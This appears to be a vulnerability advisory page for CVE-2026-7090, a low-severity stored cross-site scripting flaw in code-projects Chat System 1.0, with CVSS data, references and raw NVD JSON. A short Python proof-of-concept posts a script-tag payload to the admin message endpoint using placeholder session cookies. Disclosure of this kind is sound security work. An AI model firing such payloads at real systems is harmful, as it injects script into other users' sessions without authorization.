CVE-2026-7090

Description

A vulnerability was detected in code-projects Chat System 1.0. This affects an unknown function of the file /admin/send_message.php of the component Chat Interface. The manipulation of the argument msg results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

code-projects Chat System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable file
target_url = "http://target-host/admin/send_message.php"

# Malicious payload to test XSS
xss_payload = "<script>alert('CVE-2026-7090_XSS');</script>"

# Cookies simulating an authenticated high-privilege user (Admin)
# Required due to PR:H (High Privileges) in CVSS vector
cookies = {
    "PHPSESSID": "valid_admin_session_id",
    "security_level": "admin"
}

# Data payload targeting the vulnerable 'msg' argument
post_data = {
    "msg": xss_payload,
    "submit": "Send"
}

try:
    response = requests.post(target_url, data=post_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the chat interface to see if the alert triggers.")
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7090
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7090
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7090/
[4] VulDB https://vuldb.com/cve/CVE-2026-7090
[5] https://code-projects.org/
[6] https://gist.github.com/higordiego/4683bee16b197643744159b76d0c1ea6
[7] https://vuldb.com/submit/800383
[8] https://vuldb.com/vuln/359665
[9] https://vuldb.com/vuln/359665/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7090", "sourceIdentifier": "[email protected]", "published": "2026-04-27T06:16:04.280", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in code-projects Chat System 1.0. This affects an unknown function of the file /admin/send_message.php of the component Chat Interface. The manipulation of the argument msg results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]"}, {"url": "https://gist.github.com/higordiego/4683bee16b197643744159b76d0c1ea6", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/800383", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359665", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359665/cti", "source": "[email protected]"}]}}